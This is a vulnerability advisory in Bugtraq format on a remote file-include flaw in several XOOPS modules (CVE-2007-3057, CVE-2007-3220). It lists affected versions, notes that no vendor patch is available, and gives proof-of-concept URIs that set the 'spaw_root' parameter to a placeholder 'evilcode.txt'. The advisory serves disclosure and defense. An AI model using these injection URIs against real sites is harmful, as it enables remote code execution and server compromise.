XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
BID:24302
Info
XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
| Bugtraq ID: | 24302 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3057 CVE-2007-3220 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 04 2007 12:00AM |
| Updated: | Jul 06 2016 02:39PM |
| Credit: | Mahmood_ali, Sp[L]o1T, g00ns and GoLd_M are credited with the discovery of this vulnerability. |
| Vulnerable: |
Xoops WiwiMod 0.4 Xoops TinyContent Module 1.5 Xoops iContent Module 1.0 Xoops Cjay Content Module 3 |
| Not Vulnerable: | |
Discussion
XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Multiple XOOPS modules are prone to a remote file-include vulnerability because they fail to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the applications and the underlying system; other attacks are also possible.
Multiple XOOPS modules are prone to a remote file-include vulnerability because they fail to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the applications and the underlying system; other attacks are also possible.
Exploit / POC
XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs and exploit code are available:
http://www.example.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=evilcode.txt
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs and exploit code are available:
http://www.example.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=evilcode.txt
http://www.example.com/modules/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=evilcode.txt
Solution / Fix
XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
XOOPS Multiple Module Spaw_Control.Class.PHP Remote File Include Vulnerability
References:
References:
- XOOPS Homepage (XOOPS)
- XOOPS iContent Module Homepage (XOOPS)
- XOOPS Wiwi Module Homepage (XOOPS)